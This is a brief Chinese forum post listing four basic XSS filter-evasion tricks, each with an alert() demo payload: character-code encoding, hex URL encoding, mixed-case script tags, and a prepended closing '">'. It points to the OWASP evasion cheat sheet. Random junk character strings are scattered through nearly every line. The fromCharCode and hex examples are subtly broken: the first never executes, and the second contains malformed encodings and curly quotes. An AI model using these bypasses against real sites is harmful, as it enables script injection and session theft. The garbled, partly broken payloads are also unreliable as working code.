四种超级基础的绕过方法。" V' x# m# c$ g/ L; t# l
1.转换为ASCII码( B5 N0 {+ y) \0 p+ d
例子:原脚本为<script>alert(‘I love F4ck’)</script >( j! N7 v4 o. Q3 S6 p8 v
通过转换,变成:, h/ w/ I0 W. W4 Y6 N6 o# r
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
6 [' f! w3 X1 ^4 s
) H1 L" @; Y- h2 Z2 ?7 r9 y2.转换为HEX(十六进制)
& D# w5 S' K2 _6 H8 H" W例子:原脚本为<script>alert(‘I love F4ck’)</script>- |; {+ Y& ^/ P
通过转换,变成:( k% |5 ?. o/ X: N( A1 X
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e! N) T2 M4 x1 a5 ~, L3 t ]
; P1 q/ R! r) `' H( j/ g3.转换脚本的大小写, y* u9 R x8 J5 f) w6 o; n+ f
例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 a) n; u0 U& ^. R1 m# |8 ~0 W转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
) O9 x* n9 N, U! I ' M* W$ X) ?$ D+ f8 r9 q
4.增加闭合标记”>
& c6 J/ D/ z4 n% B* X1 |例子:原脚本为<script>alert(‘I love F4ck’)</script>; Y8 P6 p2 @' J
转换为:”><script>alert(‘I love F4ck’)</script>8 K% B. X6 C! @! d8 x
更详细绕过技术请参考此网页5 f; e W. F. B: c9 `4 g5 v
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
5 G4 h- P3 W3 `2 u . {3 X- H& U7 Y; j. [+ b) t- X
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对